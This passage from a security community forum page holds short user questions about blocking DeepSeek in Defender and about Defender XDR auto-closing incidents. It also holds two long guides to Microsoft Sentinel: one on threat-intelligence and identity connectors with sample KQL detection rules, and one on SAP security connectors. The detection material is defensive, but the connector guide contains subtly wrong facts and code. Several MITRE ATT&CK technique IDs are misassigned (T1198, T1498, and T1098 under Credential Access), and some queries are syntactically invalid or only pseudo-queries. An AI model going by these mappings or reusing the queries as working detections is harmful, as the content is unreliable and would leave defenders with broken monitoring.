entries, and notify analysts.312Views8likes1CommentIssues blocking DeepSeek
Hi all, I am investigating DeepSeek usage in our Microsoft security environment and have found inconsistent behaviour between Defender for Cloud Apps, Defender for Endpoint, and IOC controls. I am hoping to understand if others have seen the same. Environment Full Microsoft security and management suite What we are seeing Defender for Cloud Apps DeepSeek is classified as an Unsanctioned app Cloud Discovery shows ongoing traffic and active usage Multiple successful sessions and data activity visible Defender for Endpoint Indicators DeepSeek domains and URIs have been added as Indicators with Block action Indicators show as successfully applied Advanced Hunting and Device Timeline Multiple executable processes are initiating connections to DeepSeek domains Examples include Edge, Chrome, and other executables making outbound HTTPS connections Connection status is a mix of Successful and Unsuccessful No block events recorded Settings Network Protection enabled in block mode Web Content Filtering enabled SmartScreen enabled File Hash Computation enabled Network Protection Reputation mode set to 1 Has anyone else had similar issues when trying to block DeepSeek or other apps via Microsoft security suite? I am currently working with Microsoft support on this but wanted to ask here as well.113Views0likes2CommentsEmail Entity - Preview Email
Hello all, I want to ask if there is a way to monitor and be alerted when someone is viewing an email from the email entity page by clicking "Email Preview". I couldn't find any documentation, and the action is not registered in any audit logs. Maybe I am missing something so please feel free to share some info regarding this issue since I believe it can have a major impact if a disgruntled security employee chooses to leak info from private emails. Nick3.6KViews1like5CommentsThreat Intelligence & Identity Ecosystem Connectors
Microsoft Sentinel’s capability can be greatly enhanced by integrating third-party threat intelligence (TI) feeds (e.g. GreyNoise, Team Cymru) with identity and access logs (e.g. OneLogin, PingOne). This article provides a detailed dive into each connector, data types, and best practices for enrichment and false-positive reduction. We cover how GreyNoise (including PureSignal/Scout), Team Cymru, OneLogin IAM, PingOne, and Keeper integrate with Sentinel – including available connectors, ingested schemas, and configuration. We then outline technical patterns for building TI-based lookup pipelines, scoring, and suppression rules to filter benign noise (e.g. GreyNoise’s known scanners), and enrich alerts with context from identity logs. We map attack chains (credential stuffing, lateral movement, account takeover) to Sentinel data, and propose KQL analytics rules and playbooks with MITRE ATT&CK mappings (e.g. T1110: Brute Force, T1595: Active Scanning). The report also includes guidance on deployment (ARM/Bicep examples), performance considerations for high-volume TI ingestion, and comparison tables of connector features. A mermaid flowchart illustrates the data flow from TI and identity sources into Sentinel analytics. All recommendations are drawn from official documentation and industry sources. Threat Intel & Identity Connectors Overview GreyNoise (TI Feed): GreyNoise provides “internet background noise” intelligence on IPs seen scanning or probing the Internet. The Sentinel GreyNoise Threat Intelligence connector (Azure Marketplace) pulls data via GreyNoise’s API into Sentinel’s ThreatIntelligenceIndicator table. It uses a daily Azure Function to fetch indicators (IP addresses and metadata like classification, noise, last_seen) and injects them as STIX-format indicators (Network IPs with provider “GreyNoise”). This feed can then be queried in KQL. Authentication requires a GreyNoise API key and a Sentinel workspace app with Contributor rights. GreyNoise’s goal is to help “filter out known opportunistic traffic” so analysts can focus on real threats. Official docs describe deploying the content pack and workbook template. Ingested data: IP-based indicators (malicious vs. benign scans), classifications (noise, riot, etc.), organization names, last-seen dates. All fields from GreyNoise’s IP lookup (e.g. classification, last_seen) appear in ThreatIntelligenceIndicator.NetworkDestinationIP, IndicatorProvider="GreyNoise", and related fields. Query: ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" | summarize arg_max(TimeGenerated, *) by NetworkDestinationIP This yields the latest GreyNoise record per IP. Team Cymru Scout (TI Context): Team Cymru’s PureSignal™ Scout is a TI enrichment platform. The Team Cymru Scout connector (via Azure Marketplace) ingests contextual data (not raw logs) about IPs, domains, and account usage into Sentinel custom tables. It runs via an Azure Function that, given IP or domain inputs, populates tables like Cymru_Scout_IP_Data_* and Cymru_Scout_Domain_Data_CL. For example, an IP query yields multiple tables: Cymru_Scout_IP_Data_Foundation_CL, ..._OpenPorts_CL, ..._PDNS_CL, etc., containing open ports, passive DNS history, X.509 cert info, fingerprint data, etc. This feed requires a Team Cymru account (username/password) to access the Scout API. Data types: Structured TI metadata by IP/domain. No native ThreatIndicator insertion; instead, analysts query these tables to enrich events (e.g. join on SourceIP). The Sentintel TechCommunity notes that Scout “enriches alerts with real-time context on IPs, domains, and adversary infrastructure” and can help “reduce false positives”. OneLogin IAM (Identity Logs): The OneLogin IAM solution (Microsoft Sentinel content pack) ingests OneLogin platform events and user info via OneLogin’s REST API. Using the Codeless Connector Framework, it pulls from OneLogin’s Events API and Users API, storing data in custom tables OneLoginEventsV2_CL and OneLoginUsersV2_CL. Typical events include user sign-ins, MFA actions, app accesses, admin changes, etc. Prerequisites: create an OpenID Connect app in OneLogin (for client ID/secret) and register it in Azure (Global Admin). The connector queries hourly (or on schedule), within OneLogin’s rate limit of 5000 calls/hour. Data mapping: OneLoginEventsV2_CL (CL suffix indicates custom log) holds event records (time, user, IP, event type, result, etc.); OneLoginUsersV2_CL contains user account attributes. These can be joined or used in analytics. For example, a query might look for failed login events: OneLoginEventsV2_CL | where Event_type_s == "UserSessionStart" and Result_s == "Failed" (Actual field names depend on schema.) PingOne (Identity Logs): The PingOne Audit connector ingests audit activity from the PingOne Identity platform via its REST API. It creates the table PingOne_AuditActivitiesV2_CL. This includes administrator actions, user logins, console events, etc. You configure a PingOne API client (Client ID/Secret) and set up the Codeless Connector Framework. Logs are retrieved (with attention to PingOne’s license-based rate limits) and appended to the custom table. Analysts can query, for instance, PingOne_AuditActivitiesV2_CL for events like MFA failures or profile changes. Keeper (Password Vault Logs – optional): Keeper, a password management platform, can forward security events to Sentinel via Azure Monitor. As of latest docs, logs are sent to a custom log table (commonly KeeperLogs_CL) using Azure Data Collection Rules. In Keeper’s guide, you register an Azure AD app (“KeeperLogging”) and configure Azure Monitor data collection; then in the Keeper Admin Console you specify the DCR endpoint. Keeper events (e.g. user logins, vault actions, admin changes) are ingested into the table named (e.g.) Custom-KeeperLogs_CL. Authentication uses the app’s client ID/secret and a monitor endpoint URL. This is a bulk ingest of records, rather than a scheduled pull. Data ingested: custom Keeper events with fields like user, action, timestamp. Keeper’s integration is essentially via Azure Monitor (in the older Azure Sentinel approach). Connector Configuration & Data Ingestion Authentication and Rate Limits: Most connectors require API keys or OAuth credentials. GreyNoise and Team Cymru use single keys/credentials, with the Azure Function secured by a Managed Identity. OneLogin and PingOne use client ID/secret and must respect their API limits (OneLogin ~5k calls/hour; PingOne depends on licensing). GreyNoise’s enterprise API allows bulk lookups; the community API is limited (10/day for free), so production integration requires an Enterprise plan. Sentinel Tables: Data is inserted either into built-in tables or custom tables. GreyNoise feeds the ThreatIntelligenceIndicator table, populating fields like NetworkDestinationIP and ThreatSeverity (higher if classified “malicious”). Team Cymru’s Scout connector creates many Cymru_Scout_*_CL tables. OneLogin’s solution populates OneLoginEventsV2_CL and OneLoginUsersV2_CL. PingOne yields PingOne_AuditActivitiesV2_CL. Keeper logs appear in a custom table (e.g. KeeperLogs_CL) as shown in Keeper’s guide. Note: Sentinel’s built-in identity tables (IdentityInfo, SigninLogs) are typically for Microsoft identities; third-party logs can be mapped to them via parsers or custom analytic rules but by default arrive in these custom tables. Data Types & Schema: Threat Indicators: In ThreatIntelligenceIndicator, GreyNoise IPs appear as NetworkDestinationIP with associated fields (e.g. ThreatSeverity, IndicatorProvider="GreyNoise", ConfidenceScore, etc.). (Future STIX tables may be used after 2025.) Custom CL Logs: OneLogin events may include fields such as user_id_s, user_login_s, client_ip_s, event_time, etc. (The published parser issues indicate fields like app_name_s, role_id_d, etc.) PingOne logs include eventType, user, clientIP, result. Keeper logs contain Action, UserName, etc. These raw fields can be normalized in analytic rules or parsed by data transformations. Identity Info: Although not directly ingested, identity attributes from OneLogin/PingOne (e.g. user roles, group IDs) could be periodically fetched and synced to Sentinel (via custom logic) to populate IdentityInfo records, aiding user-centric hunts. Configuration Steps : GreyNoise: In Sentinel Content Hub, install the GreyNoise ThreatIntel solution. Enter your GreyNoise API key when prompted. The solution deploys an Azure Function (requires write access to Functions) and sets up an ingestion schedule. Verify the ThreatIntelligenceIndicator table is receiving GreyNoise entries Team Cymru: From Marketplace install “Team Cymru Scout”. Provide Scout credentials. The solution creates an Azure Function app. It defines a workflow to ingest or lookup IPs/domains. (Often, analysts trigger lookups rather than scheduled ingestion, since Scout is lookup-based.) Ensure roles: the Function’s managed identity needs Sentinel contributor rights. OneLogin: Use the Data Connectors UI. Authenticate OneLogin by creating a new Sentinel Web API authentication (with OneLogin’s client ID/secret). Enable both “OneLogin Events” and “OneLogin Users”. No agent is needed. After setup, data flows into OneLoginEventsV2_CL. PingOne: Similarly, configure the PingOne connector. Use the PingOne administrative console to register an OAuth client. In Sentinel’s connector blade, enter the client ID/secret and specify desired log types (Audit, maybe IDP logs). Confirm PingOne_AuditActivitiesV2_CL populates hourly. Keeper: Register an Azure AD app (“KeeperLogging”) and assign it Monitoring roles (Publisher/Contributor) to your workspace and data collection endpoint. Create an Azure Data Collection Rule (DCR) and table (e.g. KeeperLogs_CL). In Keeper’s Admin Console (Reporting & Alerts → Azure Monitor), enter the tenant ID, client ID/secret, and the DCR endpoint URL (format: https://<DCE>/dataCollectionRules/<DCR_ID>/streams/<table>?api-version=2023-01-01). Keeper will then push logs. KQL Lookup: To enrich a Sentinel event with these feeds, you might write: OneLoginEventsV2_CL | where EventType == "UserLogin" and Result == "Success" | extend UserIP = ClientIP_s | join kind=inner ( ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" and ThreatSeverity >= 3 | project NetworkDestinationIP, Category ) on $left.UserIP == $right.NetworkDestinationIP This joins OneLogin sign-ins with GreyNoise’s list of malicious scanners. Enrichment & False-Positive Reduction IOC Enrichment Pipelines: A robust TI pipeline in Sentinel often uses Lookup Tables and Functions. For example, ingested TI (from GreyNoise or Team Cymru) can be stored in reference data or scheduled lookup tables to enrich incoming logs. Patterns include: - Normalization: Normalize diverse feeds into common STIX schema fields (e.g. all IPs to NetworkDestinationIP, all domains to DomainName) so rules can treat them uniformly. - Confidence Scoring: Assign a confidence score to each indicator (from vendor or based on recency/frequency). For GreyNoise, for instance, you might use classification (e.g. “malicious” vs. “benign”) and history to score IP reputation. In Sentinel’s ThreatIntelligenceIndicator.ConfidenceScore field you can set values (higher for high-confidence IOCs, lower for noisy ones). - TTL & Freshness: Some indicators (e.g. active C2 domains) expire, so setting a Time-To-Live is critical. Sentinel ingestion rules or parsers should use ExpirationDateTime or ValidUntil on indicators to avoid stale IOCs. For example, extend ValidUntil only if confidence is high. - Conflict Resolution: When the same IOC comes from multiple sources (e.g. an IP in both GreyNoise and TeamCymru), you can either merge metadata or choose the highest confidence. One approach: use the highest threat severity from any source. Sentinel’s ThreatType tags (e.g. malicious-traffic) can accommodate multiple providers. False-Positive Reduction Techniques: - GreyNoise Noise Scoring: GreyNoise’s primary utility is filtering. If an IP is labeled noise=true (i.e. just scanning, not actively malicious), rules can deprioritize alerts involving that IP. E.g. suppress an alert if its source IP appears in GreyNoise as benign scanner. - Team Cymru Reputation: Use Scout data to gauge risk; e.g. if an IP’s open port fingerprint or domain history shows no malicious tags, it may be low-risk. Conversely, known hostile IP (e.g. seen in ransomware networks) should raise alert level. Scout’s thousands of context tags help refine a binary IOC. - Contextual Identity Signals: Leverage OneLogin/PingOne context to filter alerts. For instance, if a sign-in event is associated with a high-risk location (e.g. new country) and the IP is a GreyNoise scan, flag it. If an IP is marked benign, drop or suppress. Correlate login failures: if a single IP causes many failures across multiple users, it might be credential stuffing (T1110) – but if that IP is known benign scanner, consider it low priority. - Thresholding & Suppression: Build analytic suppression rules. Example: only alert on >5 failed logins in 5 min from IP and that IP is not noise. Or ignore DNS queries to domains that TI flags as benign/whitelisted. Apply tag-based rules: some connectors allow tagging known internal assets or trusted scan ranges to avoid alerts. Use GreyNoise to suppress alerts: SecurityEvent | where EventID == 4625 and Account != "SYSTEM" | join kind=leftanti ( ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" and Classification == "benign" | project NetworkSourceIP ) on $left.IPAddress == $right.NetworkSourceIP This rule filters out Windows 4625 login failures originating from GreyNoise-known benign scanners. Identity Attack Chains & Detection Rules Modern account attacks often involve sequential activities. By combining identity logs with TI, we can detect advanced patterns. Below are common chains and rule ideas: Credential Stuffing (MITRE T1110): Often seen as many login failures followed by a success. Detection: Look for multiple failed OneLogin/PingOne sign-ins for the same or different accounts from a single IP, then a success. Enrich with GreyNoise: if the source IP is in GreyNoise (indicating scanning), raise severity. Rule: let SuspiciousIP = OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Failed" | summarize CountFailed=count() by ClientIP_s | where CountFailed > 5; OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Success" and ClientIP_s in (SuspiciousIP | project ClientIP_s) | join kind=inner ( ThreatIntelligenceIndicator | where ThreatType == "ip" | extend GreyNoiseClass = tostring(Classification) | project IP=NetworkSourceIP, GreyNoiseClass ) on $left.ClientIP_s == $right.IP | where GreyNoiseClass == "malicious" | project TimeGenerated, Account_s, ClientIP_s, GreyNoiseClass Tactics: Initial Access (T1110) – Severity: High. Account Takeover / Impossible Travel (T1198): Sign-ins from unusual geographies or devices. Detection: Compare user’s current sign-in location against historical baseline. Use OneLogin/PingOne logs: if two logins by same user occur in different countries with insufficient time to travel, trigger. Enrich: if the login IP is also known infrastructure (Team Cymru PDNS, etc.), raise alert. Rule: PingOne_AuditActivitiesV2_CL | where EventType_s == "UserLogin" | extend loc = tostring(City_s) + ", " + tostring(Country_s) | sort by TimeGenerated desc | partition by User_s ( where TimeGenerated < ago(24h) // check last day | summarize count(), min(TimeGenerated), max(TimeGenerated) ) | where max_TimeGenerated - min_TimeGenerated < 1h and count_>1 and (range(loc) contains ",") | project User_s, TimeGenerated, loc (This pseudo-query checks multiple locations in <1 hour.) Tactics: Reconnaissance / Initial Access – Severity: Medium. Lateral Movement (T1021): Use of an account on multiple systems/apps. Detection: Two or more distinct application/service authentications by same user within a short time. Use OneLogin app-id fields or audit logs for access. If these are followed by suspicious network activity (e.g. contacting C2 via GreyNoise), escalate. Tactics: Lateral Movement – Severity: High. Privilege Escalation (T1098): If an admin account is changed or MFA factors reset in OneLogin/PingOne, especially after anomalous login. Detection: Monitor OneLogin admin events (“User updated”, “MFA enrolled/removed”). Cross-check the actor’s IP against threat feeds. Tactics: Credential Access – Severity: High. Analytics Rules (KQL) Below are six illustrative Sentinel analytics rules combining TI and identity logs. Each rule shows logic, tactics, severity, and MITRE IDs. (Adjust field names per your schemas and normalize CL tables as needed.) Multiple Failed Logins from Malicious Scanner (T1110) – High severity. Detect credential stuffing by identifying >5 failed login attempts from the same IP, where that IP is classified as malicious by GreyNoise. let BadIP = OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Failed" | summarize attempts=count() by SourceIP_s | where attempts >= 5; OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Success" and SourceIP_s in (BadIP | project SourceIP_s) | join ( ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" and ThreatSeverity >= 4 | project MaliciousIP=NetworkDestinationIP ) on $left.SourceIP_s == $right.MaliciousIP | extend AttackFlow="CredentialStuffing", MITRE="T1110" | project TimeGenerated, UserName_s, SourceIP_s, MaliciousIP Logic: Correlate failed-then-success login from same IP plus GreyNoise-malign classification. Impossible Travel / Anomalous Geo (T1198) – Medium severity. A user signs in from two distant locations within an hour. // Get last two logins per user let lastLogins = PingOne_AuditActivitiesV2_CL | where EventType_s == "UserLogin" and Outcome_s == "Success" | sort by TimeGenerated desc | summarize first_place=arg_max(TimeGenerated, City_s, Country_s, SourceIP_s, TimeGenerated) by User_s; let prevLogins = PingOne_AuditActivitiesV2_CL | where EventType_s == "UserLogin" and Outcome_s == "Success" | sort by TimeGenerated desc | summarize last_place=arg_min(TimeGenerated, City_s, Country_s, SourceIP_s, TimeGenerated) by User_s; lastLogins | join kind=inner prevLogins on User_s | extend dist=geo_distance_2points(first_place_City_s, first_place_Country_s, last_place_City_s, last_place_Country_s) | where dist > 1000 and (first_place_TimeGenerated - last_place_TimeGenerated) < 1h | project Time=first_place_TimeGenerated, User=User_s, From=last_place_Country_s, To=first_place_Country_s, MITRE="T1198" Logic: Compute geographic distance between last two logins; flag if too far too fast. Suspicious Admin Change (T1098) – High severity. Detect a change to admin settings (like role assign or MFA reset) via PingOne, from a high-risk IP (Team Cymru or GreyNoise) or after failed logins. PingOne_AuditActivitiesV2_CL | where EventType_s in ("UserMFAReset", "UserRoleChange") // example admin events | extend ActorIP = tostring(InitiatingIP_s) | join ( ThreatIntelligenceIndicator | where ThreatSeverity >= 3 | project BadIP=NetworkDestinationIP ) on $left.ActorIP == $right.BadIP | extend MITRE="T1098" | project TimeGenerated, ActorUser_s, Action=EventType_s, ActorIP Logic: Raise if an admin action originates from known bad IP. Malicious Domain Access (T1498): Medium severity. Internal logs (e.g. DNS or Web proxy) show access to a domain listed by Team Cymru Scout as C2 or reconnaissance. DeviceDnsEvents | where QueryType == "A" | join kind=inner ( Cymru_Scout_Domain_Data_CL | where ThreatTag_s == "Command-and-Control" | project DomainName_s ) on $left.QueryText == $right.DomainName_s | extend MITRE="T1498" | project TimeGenerated, DeviceName, QueryText Logic: Correlate internal DNS queries with Scout’s flagged C2 domains. (Requires that domain data is ingested or synced.) Brute-Force Firewall Blocked IP (T1110): Low to Medium severity. Firewall logs show an IP blocked for many attempts, and that IP is not noise per GreyNoise (i.e., malicious scanner). AzureDiagnostics | where Category == "NetworkSecurityGroupFlowEvent" and msg_s contains "DIRECTION=Inbound" and Action_s == "Deny" | summarize attemptCount=count() by IP = SourceIp_s, FlowTime=bin(TimeGenerated, 1h) | where attemptCount > 50 | join kind=leftanti ( ThreatIntelligenceIndicator | where IndicatorProvider == "GreyNoise" and Classification == "benign" | project NoiseIP=NetworkDestinationIP ) on $left.IP == $right.NoiseIP | extend MITRE="T1110" | project IP, attemptCount, FlowTime Logic: Many inbound denies (possible brute force) from an IP not whitelisted by GreyNoise. New Device Enrolled (T1078): Low severity. A user enrolls a new device or location for MFA after unusual login. OneLoginEventsV2_CL | where EventType == "NewDeviceEnrollment" | join kind=inner ( OneLoginEventsV2_CL | where EventType == "UserSessionStart" and Result == "Success" | top 1 by TimeGenerated asc // assume prior login | project User_s, loginTime=TimeGenerated, loginIP=ClientIP_s ) on User_s | where loginIP != DeviceIP_s | extend MITRE="T1078" | project TimeGenerated, User_s, DeviceIP_s, loginIP Logic: Flag if new device added (strong evidence of account compromise). Note: The above rules are illustrative. Tune threshold values (e.g. attempt counts) to your environment. Map the event fields (EventType, Result, etc.) to your actual schema. Use Severity mapping in rule configs as indicated and tag with MITRE IDs for context. TI-Driven Playbooks and Automation Automated response can amplify TI. Patterns include: - IOC Blocking: On alert (e.g. suspicious IP login), an automation runbook can call Azure Firewall, Azure Defender, or external firewall APIs to block the offending IP. For instance, a Logic App could trigger on the analytic alert, use the TI feed IP, and call AzFWNetworkRule PowerShell to add a deny rule. - Enrichment Workflow: After an alert triggers, an Azure Logic App playbook can enrich the incident by querying TI APIs. E.g., given an IP from the alert, call GreyNoise API or Team Cymru Scout API in real-time (via HTTP action), add the classification into incident details, and tag the incident accordingly (e.g. GreyNoiseStatus: malicious). This adds context for the analyst. - Alert Suppression: Implement playbook-driven suppression. For example, an alert triggered by an external IP can invoke a playbook that checks GreyNoise; if the IP is benign, the playbook can auto-close the alert or mark as false-positive, reducing analyst load. - Automated TI Feed Updates: Periodically fetch open-source or commercial TI and use a playbook to push new indicators into Sentinel’s TI store via the Graph API. - Incident Enrichment: On incident creation, a playbook could query OneLogin/PingOne for additional user details (like department or location via their APIs) and add as note in the incident. Performance, Scalability & Costs TI feeds and identity logs can be high-volume. Key considerations: - Data Ingestion Costs: Every log and TI indicator ingested into Sentinel is billable by the GB. Bulk TI indicator ingestion (like GreyNoise pulling thousands of IPs/day) can add storage costs. Use Sentinel’s Data Collection Rules (DCR) to apply ingestion-time filters (e.g. only store indicators above a confidence threshold) to reduce volume. GreyNoise feed is typically modest (since it’s daily, maybe thousands of IPs). Identity logs (OneLogin/PingOne) depend on org size – could be megabytes per day. Use sentinel ingestion sl analytic filters to drop low-value logs. - Query Performance: Custom log tables (OneLogin, PingOne, KeeperLogs_CL) can grow large. Periodically archive old data (e.g. export >90 days to storage, then purge). Use materialized views or scheduled summary tables for heavy queries (e.g. pre-aggregate hourly login counts). For threat indicator tables, leverage built-in indices on IndicatorId and NetworkIP for fast joins. Use project-away _* to remove metadata from large join queries. - Retention & Storage: Configure retention per table. If historical TI is less needed, set shorter retention. Use Azure Monitor’s tiering/Archive for seldom-used data. For large TI volumes (e.g. feeding multiple TIPs), consider using Sentinel Data Lake (or connecting Log Analytics to ADLS Gen2) to offload raw ingest cheaply. - Scale-Out Architecture: For very large environments, use multiple Sentinel workspaces (e.g. regional) and aggregate logs via Azure Lighthouse or Sentinel Fusion. TI feeds can be shared: one workspace collects TI, then distribute to others via Azure Sentinel’s TI management (feeds can be published and shared cross-workspaces). - Connector Limits: API rate limits dictate update frequency. Schedule connectors accordingly (e.g. daily for TI, hourly for identity events). Avoid hourly pulls of already static data (users list can be daily). For OneLogin/PingOne, use incremental tokens or webhooks if possible to reduce load. - Monitoring Health: Use Sentinel’s Log Analytics and Monitor metrics to track ingestion volume and connector errors. For example, monitor the Functions running GreyNoise/Scout for failures or throttling. Deployment Checklist & Guide Prepare Sentinel Workspace: Ensure a Log Analytics workspace with Sentinel enabled. Record the workspace ID and region. Register Applications: In Azure AD, create and note any Service Principal needed for functions or connectors (e.g. a Sentinel-managed identity for Functions). In each vendor portal, register API apps and credentials (OneLogin OIDC App, PingOne API client, Keeper AD app). Network & Security: If needed, configure firewall rules to allow outbound to vendor APIs. Install Connectors: In Sentinel Content Hub or Marketplace, install the solutions for GreyNoise TI, Team Cymru Scout, OneLogin IAM, PingOne. Follow each wizard to input credentials. Verify the “Data Types” (Logs, Alerts, etc.) are enabled. Create Tables & Parsers (if manual): For Keeper or unsupported logs, manually create custom tables (via DCR in Azure portal). Import JSON to define fields as shown in Keeper’s docs Test Data Flow: After each setup, wait 1–24 hours and run a simple query on the destination table (e.g. OneLoginEventsV2_CL | take 5) to confirm ingestion. Deploy Ingestion Rules: Use Sentinel Threat intelligence ingestion rules to fine-tune feeds (e.g. mark high-confidence feeds to extend expiration). Optionally tag/whitelist known good. Configure Analytics: Enable or create rules using the KQL above. Place them in the correct threat hunting or incident rule categories (Credential Access, Lateral Movement, etc.). Assign appropriate alert severity. Set up Playbooks: For automated actions (alert enrichment, IOC blocking), create Logic App playbooks. Test with mock alerts (dry run) to ensure correct API calls. Tuning & Baseline: After initial alerts, tune queries (thresholds, whitelists) to reduce noise. Maintain suppression lists (e.g. internal pentest IPs). Use the MITRE mapping in rule details for clarity. Documentation & Training: Document field mappings (e.g. OneLoginEvents fields), and train SOC staff on new TI-enriched alert fields. Connectors Comparison Connector Data Sources Sent. Tables Update Freq. Auth Method Key Fields Enriched Limits/Cost Pros/Cons GreyNoise IP intelligence (scanners) ThreatIntelligenceIndicator Daily (scheduled pull) API Key IP classification, noise, classification API key required; paid license for large usage Pros: Filters benign scans, broad scan visibility Con: Only IP-based (no domain/file). Team Cymru Scout Global IP/domain telemetry Cymru_Scout_*_CL (custom tables) On-demand or daily Account credentials Detailed IP/domain context (ports, PDNS, ASN, etc.) Requires Team Cymru subscription. Potentially high cost for feed. Pros: Rich context (open ports, DNS, certs); great for IOC enrichment. Con: Complex setup, data in custom tables only. OneLogin IAM OneLogin user/auth logs OneLoginEventsV2_CL, OneLoginUsersV2_CL Polls hourly OAuth2 (client ID/secret) User, app, IP, event type (login, MFA, etc.) OneLogin API: 5K calls/hour. Data volume moderate. Pros: Direct insight into cloud identity use; built-in parser available. Cons: Limited to OneLogin environment only. PingOne Audit PingOne audit logs PingOne_AuditActivitiesV2_CL Polls hourly OAuth2 (client ID/secret) User actions, admin events, MFA logs Rate limited by Ping license. Data volume moderate. Pros: Captures critical identity events; widely used product. Cons: Requires PingOne Advanced license for audit logs. Keeper (custom) Keeper security events KeeperLogs_CL (custom) Push (continuous) OAuth2 (client ID/secret) + Azure DCR Vault logins, record accesses, admin changes None (push model); storage costs. Pros: Visibility into password vault activity (often blind spot). Cons: More manual setup; custom logs not parsed by default. Data Flow Diagram This flowchart shows GreyNoise (GN) feeding the Threat Intelligence table, Team Cymru feeding enrichment tables, and identity sources pushing logs. All data converges into Sentinel, where enrichment lookups inform analytics and automated responses.252Views8likes0CommentsObserved Automation Discrepancies
Hi Team ... I want to know the logic behind the Defender XDR Automation Engine . How it works ? I have observed Defender XDR Automation Engine Behavior contrary to expectations of identical incident and automation handling in both environments, discrepancies were observed. Specifically, incidents with high-severity alerts were automatically closed by Defender XDR's automation engine before reaching their SOC for review, raising concerns among clients and colleagues. Automation rules are clearly logged in the activity log, whereas actions performed by Microsoft Defender XDR are less transparent . A high-severity alert related to a phishing incident was closed by Defender XDR's automation, resulting in the associated incident being closed and removed from SOC review. Wherein the automation was not triggered by our own rules, but by Microsoft's Defender XDR, and sought clarification on the underlying logic.SAP & Business-Critical App Security Connectors
I validated what it takes to make SAP and SAP-adjacent security signals operational in a SOC: reliable ingestion, stable schemas, and detections that survive latency and schema drift. I focus on four integrations into Microsoft Sentinel: SAP Enterprise Threat Detection (ETD) cloud edition (SAPETDAlerts_CL, SAPETDInvestigations_CL), SAP S/4HANA Cloud Public Edition agentless audit ingestion (ABAPAuditLog), Onapsis Defend (Onapsis_Defend_CL), and SecurityBridge (also ABAPAuditLog). Because vendor API specifics for ETD Retrieval API / Audit Retrieval API aren’t publicly detailed in the accessible primary sources I could retrieve, I explicitly label pagination/rate/time-window behaviors as unspecified where appropriate. Connector architectures and deployment patterns For SAP-centric telemetry I separate two planes: First is SAP application telemetry that lands in SAP-native tables, especially ABAPAuditLog, ABAPChangeDocsLog, ABAPUserDetails, and ABAPAuthorizationDetails. These tables are the foundation for ABAP-layer monitoring and are documented with typed columns in Azure Monitor Logs reference. Second is external “security product” telemetry (ETD alerts, Onapsis findings). These land in custom tables (*_CL) and typically require a SOC-owned normalization layer to avoid brittle detections. Within Microsoft’s SAP solution itself, there are two deployment models: agentless and containerized connector agent. The agentless connector uses SAP Cloud Connector and SAP Integration Suite to pull logs, and Microsoft documents it as the recommended approach; the containerized agent is being deprecated and disabled on September 14, 2026. On the “implementation technology” axis, Sentinel integrations generally show up as: - Codeless Connector Framework (CCF) pollers/pushers (SaaS-managed ingestion definitions with DCR support). - Function/Logic App custom pipelines using the Logs Ingestion API when you need custom polling, enrichment, or a vendor endpoint that isn’t modeled in CCF. In my view, ETD and S/4HANA Cloud connectors are “agentless” from the Sentinel side (API credentials only), while Onapsis Defend and SecurityBridge connectors behave like push pipelines because Microsoft requires an Entra app + DCR permissions (typical Logs Ingestion API pattern). Authentication and secrets handling Microsoft documents the required credentials per connector: - ETD cloud connector requires Client Id + Client Secret for ETD Retrieval API (token mechanics unspecified). - S/4HANA Cloud Public Edition connector requires Client Id + Client Secret for Audit Retrieval API (token mechanics unspecified), and Microsoft notes “alternative authentication mechanisms” exist (details in linked repo are unspecified in accessible sources). - Onapsis Defend and SecurityBridge connectors require a Microsoft Entra ID app registration and Azure permission to assign Monitoring Metrics Publisher on DCRs. This maps directly to the Logs Ingestion API guidance, where a service principal is granted DCR access via that role (or the Microsoft.Insights/Telemetry/Write data action). For production, I treat these as “SOC platform secrets”: - Store client secrets/certificates in Key Vault when you own the pipeline (Function/Logic App); rotate on an operational schedule; alert on auth failures and sudden ingestion drops. - For vendor-managed ingestion (Onapsis/SecurityBridge), I still require: documented ownership of the Entra app, explicit RBAC scope for the DCR, and change control for credential rotation because a rotated secret is effectively a data outage. API behaviors and ingestion reliability For ETD Retrieval API and Audit Retrieval API, pagination/rate limits/time windows are unspecified in the accessible vendor documentation I could retrieve. I therefore design ingestion and detections assuming non-ideal API behavior: late-arriving events, cursor/page limitations, and throttling. CCF’s RestApiPoller model supports explicit retry policy, windowing, and multiple paging strategies, so if/when you can obtain vendor API semantics, you can encode them declaratively (rather than writing fragile code). For the SAP solution’s telemetry plane, Microsoft provides strong operational cues: agentless collection flows through Integration Suite, and troubleshooting typically happens in the Integration Suite message log; this is where I validate delivery failures before debugging Sentinel-side parsers. For scheduled detections, I always account for ingestion delay explicitly. Microsoft’s guidance is to widen event lookback by expected delay and then constrain on ingestion_time() to prevent duplicates from overlap. Schema, DCR transformations, and normalization layer Connector attribute comparison Connector Auth method Sentinel tables Default polling Backfill Pagination Rate limits SAP ETD (cloud) Client ID + Secret (ETD Retrieval API) SAPETDAlerts_CL, SAPETDInvestigations_CL unspecified unspecified unspecified unspecified SAP S/4HANA Cloud (agentless) Client ID + Secret (Audit Retrieval API); alt auth referenced ABAPAuditLog unspecified unspecified unspecified unspecified Onapsis Defend Entra app + DCR permission (Monitoring Metrics Publisher) Onapsis_Defend_CL n/a (push pattern) unspecified n/a unspecified SecurityBridge Entra app + DCR permission (Monitoring Metrics Publisher) ABAPAuditLog n/a (push pattern) unspecified n/a unspecified Ingestion-time DCR transformations Sentinel supports ingestion-time transformations through DCRs to filter, enrich, and mask data before it’s stored. Example: I remove low-signal audit noise and mask email identifiers in ABAPAuditLog: source | where isnotempty(TransactionCode) and isnotempty(User) | where TransactionCode !in ("SM21","ST22") // example noise; tune per tenant | extend Email = iif(Email has "@", strcat(substring(Email,0,2),"***@", tostring(split(Email,"@")[1])), Email) Normalization functions Microsoft explicitly recommends using SAP solution functions instead of raw tables because they can change the infrastructure beneath without breaking detections. I follow the same pattern for ETD/Onapsis custom tables: I publish SOC-owned functions as a schema contract. .create-or-alter function with (folder="SOC/SAP") Normalize_ABAPAudit() { ABAPAuditLog | project TimeGenerated, SystemId, ClientId, User, TransactionCode, TerminalIpV6, MessageId, MessageClass, MessageText, AlertSeverityText, UpdatedOn } .create-or-alter function with (folder="SOC/SAP") Normalize_ETDAlerts() { 